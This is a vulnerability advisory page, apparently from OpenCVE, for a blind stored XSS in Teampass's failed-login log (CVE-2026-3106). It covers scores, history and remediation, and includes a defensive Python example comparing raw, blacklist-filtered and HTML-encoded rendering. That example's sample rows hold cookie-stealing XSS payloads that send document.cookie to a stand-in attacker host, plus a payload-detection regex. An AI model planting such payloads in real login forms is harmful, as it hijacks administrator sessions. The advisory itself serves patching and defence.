Description
Blind Cross-Site Scripting (XSS) in Teampass, versions prior to 3.1.5.16, within the password manager login functionality in the 'contraseña' parameter of the login form 'redacted/index.php'. During failed authentication attempts, the application does not properly clean or encode the information entered by the user in the username field. As a result, arbitrary JavaScript code is automatically executed in the administrator's browser when viewing failed login entries, resulting in a blind XSS condition.
Published: 2026-03-31
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting in Administrative Interface
Action: Immediate Patch
AI Analysis

Impact

Teampass versions prior to 3.1.5.16 contain a blind (stored) Cross-Site Scripting flaw in the login form's "contraseña" parameter. When an authentication attempt fails, the value the attacker submitted is recorded and later rendered in the failed-login list without HTML encoding, so JavaScript embedded in that value executes in the browser of any administrator who opens the list. Because the payload fires as soon as the page is rendered, no click or other interaction with the injected content is required. The script runs with the administrator's session, which in a password manager is the most privileged context available: it can read session tokens, issue requests on the administrator's behalf, modify data, or deface the interface.

Affected Systems

According to the description, every Teampass deployment running a version prior to 3.1.5.16 is affected. The vendor solution recorded on this page is version 3.1.5.24; upgrade to that release or later. The page does not explain the gap between the two version numbers, so do not assume an intermediate build (3.1.5.16 through 3.1.5.23) is safe without confirming it against the vendor's release notes.

Risk and Exploitability

The CVSS v4.0 score on this record is 9.3 (Critical), with vector AV:N/AC:L/AT:N/PR:N/UI:N. NVD's CVSS v3.1 assessment, shown in the history below, is 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N; the UI:R component reflects that an administrator must open the log for the payload to run, which the v4.0 vector does not account for. The EPSS score is below 1%, the vulnerability is not in the CISA KEV catalog, and the SSVC record marks exploitation as "none" while rating the attack as automatable. Planting the payload needs no authentication: a single crafted login request to the endpoint is enough, and execution follows whenever an administrator later views the failed-login log. On an internet-exposed instance the login form is reachable by anyone, so the precondition is trivial and the practical risk is high even though no exploitation has been observed.

Generated by OpenCVE AI on March 31, 2026 at 10:50 UTC.

Remediation

Vendor Solution

The issue has been fixed in version 3.1.5.24.


OpenCVE Recommended Actions

  • Apply the official Teampass patch, upgrading to version 3.1.5.24 or later.
  • If a patch cannot be applied immediately, restrict network access to the login endpoint (VPN or IP allow-list) so that arbitrary internet hosts cannot submit login attempts, and limit which accounts may open the failed-login log. Note that the payload executes as soon as the log page is rendered; telling administrators not to click links in the log does not help. Audit existing failed-login entries for markup (for example by querying the database directly) before anyone views them in a browser.
  • A web application firewall rule that blocks obvious payloads in the "contraseña" parameter can reduce exposure as a temporary safeguard, but tag blacklists are bypassable (an event handler on an ordinary element needs no <script> tag). The durable fix is contextual HTML encoding of the stored value at the point where the log is rendered; a Content Security Policy on the administrative interface adds a second layer.
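The rendering flaw described in the Impact section and the "strip scripts" caveat above, as an added illustration that is not Teampass's own code: a constructed failed-login table is rendered three ways (raw, after a script-tag blacklist, and HTML-encoded), and a heuristic audit flags rows that already carry markup. The row layout, field names, and sample payloads are assumptions made for the example.

```python
"""
Added example, not Teampass code. Shows why unencoded rendering of a
failed-login value is exploitable, why a <script>-tag blacklist is not a
fix, and what contextual HTML encoding does to the same input. Also gives
a small audit helper for rows already stored before an upgrade.
"""
import html
import re

# Constructed sample rows standing in for a failed-login log.
# Field names and the attacker host are assumptions, not Teampass's schema.
FAILED_LOGINS = [
    {"date": "2026-03-31 09:14:02", "login": "alice", "ip": "203.0.113.7"},
    {"date": "2026-03-31 09:14:40",
     "login": "<script>fetch('//attacker.example/?c='+document.cookie)</script>",
     "ip": "198.51.100.23"},
    {"date": "2026-03-31 09:15:11",
     "login": "<img src=x onerror=\"fetch('//attacker.example/?c='+document.cookie)\">",
     "ip": "198.51.100.23"},
]

ROW_TEMPLATE = "<tr><td>{date}</td><td>{login}</td><td>{ip}</td></tr>"


def render_row_vulnerable(row):
    """The pattern the advisory describes: untrusted input dropped straight into markup."""
    return ROW_TEMPLATE.format(**row)


def strip_script_tags(value):
    """A tag-blacklist filter of the kind an ad-hoc WAF rule might apply.
    It removes <script> elements only, so event-handler payloads pass through untouched."""
    return re.sub(r"<\s*/?\s*script\b[^>]*>", "", value, flags=re.IGNORECASE)


def render_row_filtered(row):
    """Rendering after the blacklist: still unsafe for the <img onerror=...> row."""
    return ROW_TEMPLATE.format(date=row["date"],
                               login=strip_script_tags(row["login"]),
                               ip=row["ip"])


def render_row_encoded(row):
    """The fix: encode every untrusted value for the HTML text context at output time.
    html.escape(quote=True) turns < > & " ' into entities, so no markup survives."""
    cells = {k: html.escape(str(v), quote=True) for k, v in row.items()}
    return ROW_TEMPLATE.format(**cells)


# Heuristic for an audit pass: a tag opener, an on*= handler, or a javascript: URL.
ACTIVE_HTML = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def is_suspicious_login(value):
    """True if the stored login string looks like an XSS payload. This is for
    finding entries already planted in a log, not a substitute for encoding."""
    return bool(ACTIVE_HTML.search(value))


def audit_failed_logins(rows):
    """Return (index, ip, login) for each row whose login looks like a payload."""
    return [(i, r["ip"], r["login"])
            for i, r in enumerate(rows) if is_suspicious_login(r["login"])]


if __name__ == "__main__":
    for row in FAILED_LOGINS:
        print("vulnerable:", render_row_vulnerable(row))
        print("filtered:  ", render_row_filtered(row))
        print("encoded:   ", render_row_encoded(row))
    print("flagged:", audit_failed_logins(FAILED_LOGINS))
```

The third row is the one that matters for the WAF caveat: the blacklist leaves `onerror=` in place, while encoding turns the leading `<` into `&lt;` and the browser renders the row as inert text. The audit helper is deliberately loose (it would flag a legitimate login containing `<`), which is the right trade-off for a one-off review of a log that should never contain markup.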

Generated by OpenCVE AI on March 31, 2026 at 10:50 UTC.


Advisories

No advisories yet.

History

Tue, 07 Apr 2026 18:00:00 +0000

Type: Metrics
Values Removed: (none)
Values Added: cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Tue, 31 Mar 2026 18:15:00 +0000

Type: Metrics
Values Removed: (none)
Values Added: ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Tue, 31 Mar 2026 09:15:00 +0000

Values Removed: (none)
Values Added:
  Description: Blind Cross-Site Scripting (XSS) in Teampass, versions prior to 3.1.5.16, within the password manager login functionality in the 'contraseña' parameter of the login form 'redacted/index.php'. During failed authentication attempts, the application does not properly clean or encode the information entered by the user in the username field. As a result, arbitrary JavaScript code is automatically executed in the administrator's browser when viewing failed login entries, resulting in a blind XSS condition.
  Title: Multiple vulnerabilities in Teampass
  First Time appeared: Teampass; Teampass teampass
  Weaknesses: CWE-79
  CPEs: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:*
  Vendors & Products: Teampass; Teampass teampass
  References: (none recorded)
  Metrics: cvssV4_0 {'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-03-31T18:04:26.550Z

Reserved: 2026-02-24T10:44:55.903Z

Link: CVE-2026-3106

Vulnrichment

Updated: 2026-03-31T15:02:25.268Z

NVD

Status: Analyzed

Published: 2026-03-31T09:16:22.700

Modified: 2026-04-07T15:36:09.380

Link: CVE-2026-3106

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-31T20:39:20Z

Weaknesses